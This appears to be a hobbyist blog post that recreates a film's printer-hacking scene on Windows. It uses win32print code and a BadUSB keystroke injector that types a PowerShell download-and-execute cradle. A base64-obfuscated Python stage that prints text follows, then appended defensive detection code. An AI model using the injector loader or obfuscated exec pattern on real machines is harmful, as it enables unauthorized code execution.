

How I recreated an iconic hacking scene exploiting several printers

From the movie “Who Am I — No System is Safe”


I don’t know of other “hackers”, but I am a total n00b when it comes to “must watch hacking movies/series”.

Yeah. I do. Shut up.

The (pre) Plot

As I entered college, a friend of mine forced me to watch
“The Social Network” on the very second day, and frankly, I loved it!
I don’t know how it affected me, but I’m sure it added a cool GIF to my arsenal. (and you’ll see it, soon)

Thereafter, I’ve seen a few. (I can’t forget Mr. Robot, dying for the fourth season)
Recently, I saw “Who Am I — No System is Safe”.

(subtitles saved my life, saw original (in Russian) aka without dubbing)

Benjamin — a lonely computer expert — meets the charismatic Max, and the two of them — along with Max’s friends — form CLAY, a subversive hacker group.

The Real Plot

I loved the movie, and like every movie or book I read, it was time to implement something from the movie to the real world that enhances my knowledge, experience or .. anything in between.
I do it with everything I see or read, and I’ll try to share all those stories soon.
Okay, moving right along. (a line from ‘The Social Network’)

I found the following portion very appealing.

The Fun, printers going crazy

How it all happened?

Here we go ..

The iconic “hacking” scene we all crave for

As I found this interesting, I started my search. I started reading about printers, how they communicate, which protocols are used for information exchange, past research papers on exploiting printers, and all that.

The Boring Reconnaissance Corner

Some languages/protocols that our printers speak :

  • SNMP
  • PostScript
  • LPD
  • IPP
  • Raw
  • SMB

I found a ton of interesting things, I bricked my home printer, opened all the parts, ripped the circuitry, and had a lot of fun, and I’ll share my findings.

Late Mr. Home Printer

But, for now, let’s concentrate on the title, which is, re-creating the above scenario in our real world. As you can guess, there are many printers, and, there are many languages, so, there can be drama, a hell lot of drama.

And as you’re a 1337 HaX0r, your “exploit sandwich” should work. Period.

Solution ?

Market Share of various major Operating Systems

Bingo. (Benjamin’s favorite word in the movie)

Windows to our rescue

As it has the major share, let’s get our hands dirty abusing Windows.
As we can visualize the underlying architecture, the printer talks/interfaces to the computer via its own preferred language (PJL, PML, PostScript …), then the computer processes it and infers from it.

But, when we click the “print” button, to print our pout-selfie, do you know what happens, in crux ?

My drawing, I know, I am a born artist.

So, instead of attacking the (printer → computer) interface, why not look into the (application → computer) interface ?

Attacking the API

Or maybe just low level interfacing?

Instead of writing a bunch of native C++, why not abstract this layer as well ?
Let’s use a Python wrapper that encompasses the majority of the low-level win32 protocols.

After tinkering with win32api for a long time, scratching my head a couple of times, and learning many things about the win32 protocols, wrappers and COM objects, I also came to know about another module, named win32print.
After a lot of digging, I finally created the gem, the crown jewel, the l33t c0d3!

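import tempfile, win32api, win32print
path = tempfile.mktemp (".txt")
with open (path, "a") as f:
    f.write ("Inject this!")  # the text that will be printed
# "printto" verb: print the file on the named printer (here, the default one)
win32api.ShellExecute (0, "printto", path, '"%s"' % win32print.GetDefaultPrinter (), ".", 0)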

This is my Eiffel Tower. This is my Rachmaninoff’s Third. My Pieta. It’s completely elegant, it’s baffling-ly beautiful, and it’s capable of making any printer connected to windows system go crazy. I call it “The Ex-Wife.”

(a reference from Iron Man 2, Thanks Justin Hammer)

Code Tear-down

We can break the code into three major components :
- ShellExecute function (Performs an operation on a specified file)
- printto (Object Verbs)
- win32print API and GetDefaultPrinter function

ShellExecute Function

ShellExecute is the code equivalent of a user “double-clicking” a file icon. It causes Windows to work out what application the document file is associated with, launch the program and have it load the document file.

By using ShellExecute, you don’t need to know the name or location of the program that’s registered to a particular file type. Windows takes care of that for you. For example, you can ShellExecute a [.PDF] file and, so long as Reader, Acrobat or some other PDF-reading app is installed, Windows will launch it and load the PDF for you.

Object Verbs

Each command on the shortcut menu is identified in the registry by its verb. These verbs are the same as those used by ShellExecuteEx when launching applications programmatically. (Quick Reference — Launching Applications.)

A verb is a simple text string that is used by the Shell to identify the associated command. Each verb corresponds to the command string used to launch the command in a console window.

List of verbs

Wait a minute! Where’s the actual deal ? The “printto” verb isn’t there in that list!

The printto verb is also canonical but is never displayed. It allows the user to print a file by dragging it to a printer object.

“printto” Object Verb

Right-clicking an object on Microsoft Windows 95 and later systems usually pops up a shortcut menu. This menu contains a list of commands that the user can select to perform various actions on the object. This section is an introduction to shortcut menus for file system objects.

  • Shortcut Menus for File System Objects
  • Shortcut Menu Verbs
  • Extending the Shortcut Menu for a File Class
  • Extending the Shortcut Menu for Predefined Shell Objects
  • Registering an Application to Handle Arbitrary File Classes
  • Extending the New Sub-menu

Kudos : — Mat Baker & Michael “micolous” both helped us to see the under-documented printto verb which takes the printer name as a parameter, enclosed in quotes if it contains spaces.
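
How the lookup described above can be audited, as an added example that is not from the original post: it resolves an extension to its class and then to the command registered for a verb, following the classic HKEY_CLASSES_ROOT layout. The sample registry contents and all function names are constructed for illustration; per-user association overrides are ignored.

```python
import sys

# Constructed sample of the registry layout (not read from a real machine):
# subkey of HKEY_CLASSES_ROOT -> its default value.
SAMPLE_HKCR = {
    r".txt": "txtfile",
    r"txtfile\shell\open\command": r"%SystemRoot%\system32\NOTEPAD.EXE %1",
    r"txtfile\shell\printto\command":
        r'%SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4"',
    r".xyz": "xyzfile",  # hypothetical class with no printto handler
    r"xyzfile\shell\open\command": r'"C:\Tools\xyz.exe" "%1"',
}

def sample_reader(subkey):
    """Reader backed by the constructed sample above."""
    return SAMPLE_HKCR.get(subkey)

def winreg_reader(subkey):
    """Read the default value of HKCR\\<subkey> on a real Windows host."""
    import winreg  # Windows-only, so imported lazily
    try:
        return winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, subkey)
    except OSError:
        return None

def resolve_verb(extension, verb, read_default=sample_reader):
    """Return the command template registered for (extension, verb), or None."""
    prog_id = read_default(extension)
    if not prog_id:
        return None
    return read_default(rf"{prog_id}\shell\{verb}\command")

def audit_printto(extensions, read_default=sample_reader):
    """Map each extension to its printto command (None if not registered)."""
    return {ext: resolve_verb(ext, "printto", read_default) for ext in extensions}

if __name__ == "__main__":
    reader = winreg_reader if sys.platform == "win32" else sample_reader
    for ext, cmd in audit_printto([".txt", ".xyz"], reader).items():
        print(ext, "->", cmd or "no printto handler")
```

In the resolved template, "%1" is the file passed to ShellExecute and "%2" is the quoted printer name passed as its parameter.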

win32print API

Q-1. Why do we need this?
Answer : — We need an API which can give us access to the printer at a low level.
Q-2. What do we need?
Answer : — Tim Golden’s win32print module looks perfect!

After reading the code, seeing the documentation, I googled and read about various parts/functions.

Get ready for major remodel, fellas!

(another one from Iron Man 2)

Printing text is cool, but what if I want the ditto scene, the ditto document ?

Everybody wants a Ditto! (in Pokemon, obviously, yeah, even Ash Ketchum, see EP037)

Printing document

The win32print module offers (almost) all the printing primitives you’ll need to take some data and throw it at a printer which has already been defined on your system. The data must be in a form which the printer will happily swallow, usually something like text (which we used before) or raw PCL.

Let the hacking begin

The weapon I was talking about ;)

Printing Documents

import win32ui
import win32print
import win32con
# device context bound to the default printer
hDC = win32ui.CreateDC ()
hDC.CreatePrinterDC (win32print.GetDefaultPrinter ())
hDC.StartDoc ("Injected Doc")
hDC.StartPage ()
# MM_TWIPS: 1440 units per inch, y axis pointing up (hence the negative values)
hDC.SetMapMode (win32con.MM_TWIPS)
hDC.DrawText ("HELLO WORLD", (0, 1440 * -1, 1440 * 8, 1440 * -2), win32con.DT_CENTER)
hDC.EndPage ()
hDC.EndDoc ()

Printing Images

import win32print
import win32ui
from PIL import Image, ImageWin
PHYSICALWIDTH, PHYSICALHEIGHT = 110, 111  # GetDeviceCaps indices: page size in device units
hDC = win32ui.CreateDC ()
hDC.CreatePrinterDC (win32print.GetDefaultPrinter ())
bmp = Image.open ("whoami.jpg")
hDC.StartDoc ("whoami?")
hDC.StartPage ()
dib = ImageWin.Dib (bmp)
# stretch the image over the whole physical page
dib.draw (hDC.GetHandleOutput (), (0, 0, hDC.GetDeviceCaps (PHYSICALWIDTH), hDC.GetDeviceCaps (PHYSICALHEIGHT)))
hDC.EndPage ()
hDC.EndDoc ()
hDC.DeleteDC ()

Demo Time!

NOTE: I did all my tests on an isolated laptop which is not connected to a printer. So, it instead diverted to the “Save PDF” method; that’s why running the payloads prompted to save the generated data instead of directly printing it.

Don’t believe those? Great! Go and script it yourself, just don’t print, or maybe print just one (and no Pewdiepie fever, please). Save paper.

Making it even cooler than that Hollywood movie scene!

How about doing all of it without touching any keyboard or thinking of any “programmical” thoughts?

The Prodigal Son Returns!

(this one from Iron Man 3)

Time to introduce our bad boy, the BadUSB! (or maybe Rubber Ducky?)

Actually, it’s none of the above, nor is it the original BadUSB, which utilized a flaw in the Phison 2251–03 (2303) chip-set to patch it with custom firmware, making it a programmable killing machine just like the USB Rubber Ducky but with a boring cover with no yellow ducks :(

Hold on, let me search my so called ‘lab’ as I am home (summer vacations), … Annd, I found it!

Yes, I watched that Black Hat video in the same year (2014), got crazy as Hak5 doesn’t ship to India (still, checked today) and it was much cooler (technically), broke every pen-drive I had lying around and finally found one (maybe two) having the same chip-set.

Here’s one similar chip-set, desoldered

Ah, memories ❤

How you used to connect this? (just in case..)

Found in folders, connections to a normal USB, because I broke the USB Male Connector

So, WHAT IS IT ! ?

It’s an ATtiny85 (can also use Arduino Uno r3, but it’ll not camouflage as a necklace) micro-controller with patched HID (human interface device) firmware loaded onto it, making it something like the above two serial killers. (but cheaper, and somewhere in between technically: less than Phison firmware patching, more than grabbing a USB Rubber Ducky)

The Staged Payload

The code running inside our micro-controller acts as a stub loader.

#include "DigiKeyboard.h"
#define KEY_UP_ARROW 0x52
#define KEY_DOWN_ARROW 0x51
#define KEY_LEFT_ARROW 0x50
#define KEY_RIGHT_ARROW 0x4F
void setup() {
  // nothing to initialise
}
void loop() {
  // Win+R opens the Run dialog
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  // types the stub that fetches the final stage (URL not shown)
  DigiKeyboard.print("powershell iex ((New-Object System.Net.WebClient).DownloadString(''))");
  for(;;){ /*empty*/ }  // run once, then idle
}

Final Stage Payload

py -c “import base64;exec(base64.b64decode(‘aW1wb3J0IHdpbjMydWkNCmltcG9ydCB3aW4zMnByaW50DQppbXBvcnQgd2luMzJjb24NCklOQ0ggPSAxNDQwDQpoREMgPSB3aW4zMnVpLkNyZWF0ZURDICgpDQpoREMuQ3JlYXRlUHJpbnRlckRDICh3aW4zMnByaW50LkdldERlZmF1bHRQcmludGVyICgpKQ0KaERDLlN0YXJ0RG9jICgiSW5qZWN0ZWQgRG9jIikNCmhEQy5TdGFydFBhZ2UgKCkNCmhEQy5TZXRNYXBNb2RlICh3aW4zMmNvbi5NTV9UV0lQUykNCmhEQy5EcmF3VGV4dCAoIkhFTExPIFdPUkxELCBieSBAMHg0OHBpcmFqIiwgKDAsIElOQ0ggKiAtMSwgSU5DSCAqIDgsIElOQ0ggKiAtMiksIHdpbjMyY29uLkRUX0NFTlRFUikNCmhEQy5FbmRQYWdlICgpDQpoREMuRW5kRG9jICgp’))”
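
A defender's view of the two stages above, added here as an example and not part of the original post: it flags the typed PowerShell stub and the `py -c` base64 one-liner in process command lines, and summarises the decoded script with `ast` instead of running it. The sample command lines, the URL and all function names are constructed for illustration.

```python
import ast
import base64
import re

# Patterns modelled on the two stages above (typed stub, base64 one-liner).
CRADLE = re.compile(r"(?i)\bpowershell\b.*\biex\b.*DownloadString\(")
B64_EXEC = re.compile(
    r"(?i)\bpy(?:thon)?(?:\.exe)?\b.*\bexec\(base64\.b64decode\(['\"]([A-Za-z0-9+/=]+)['\"]")

def static_summary(blob):
    """Decode the blob and parse it with ast; the payload is never executed."""
    source = base64.b64decode(blob).decode("utf-8", errors="replace")
    imports, calls = set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            imports.update(alias.name for alias in node.names)
        elif isinstance(node, ast.ImportFrom):
            imports.add(node.module or "")
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            calls.add(node.func.attr)
    return sorted(imports), sorted(calls)

def triage(command_line):
    """Return a list of (finding, detail) tuples for one process command line."""
    findings = []
    if CRADLE.search(command_line):
        findings.append(("download-cradle", None))
    match = B64_EXEC.search(command_line)
    if match:
        try:
            findings.append(("base64-exec", static_summary(match.group(1))))
        except (ValueError, SyntaxError):
            findings.append(("base64-exec", "undecodable"))
    return findings

# Constructed sample command lines (hypothetical URL, shortened second stage).
_STAGE = ("import win32ui\nimport win32print\nhDC = win32ui.CreateDC()\n"
          "hDC.CreatePrinterDC(win32print.GetDefaultPrinter())\n")
SAMPLES = [
    "powershell iex ((New-Object System.Net.WebClient)"
    ".DownloadString('http://example.invalid/stage'))",
    'py -c "import base64;exec(base64.b64decode(\'%s\'))"'
    % base64.b64encode(_STAGE.encode()).decode(),
    "notepad.exe /pt report.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line) or "clean", "<-", line[:60])
```

The imports and call names in the summary (win32print, GetDefaultPrinter and so on) show what the encoded stage touches before anyone decides whether to detonate it in a sandbox.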


Victim’s PC

Attacker’s PC


About the Author

Piyush Raj is now an 18-year-old college freshman currently working with OWASP Foundation as a Google Student Developer or say GSoCer. He’s a past Google Code-In Contribution Winner, and loves playing football.

You can connect with him over LinkedIn, Twitter, Instagram

Social Jazz.


(I know it’s Medium, but eh.)

  1. Who Am I — No System is Safe
  2. ffmpeg -ss 00:00:00 -i input.mp4 -to 00:00:03 -c copy output.mp4
  3. http://zulko.github.io/moviepy/install.html
  4. https://www.python.org/
  5. http://timgolden.me.uk/pywin32-docs/html/com/win32com/HTML/QuickStartClientCom.html
  6. Printer Protocols — LPD, IPP, Raw, SMB
  7. Printer Languages — PJL, PCL, PostScript
  8. https://docs.microsoft.com/en-us/windows/desktop/shell/launch
  9. mhammond/pywin32/win32print
  10. https://bulbapedia.bulbagarden.net/wiki/EP037



Piyush Raj ~ Rex

Google Code-In C. Winner. GsOCer ‘19. Independent Security Researcher. Have hacked Medium, Mozilla, Opera & many more. Personal Website: https://0x48piraj.com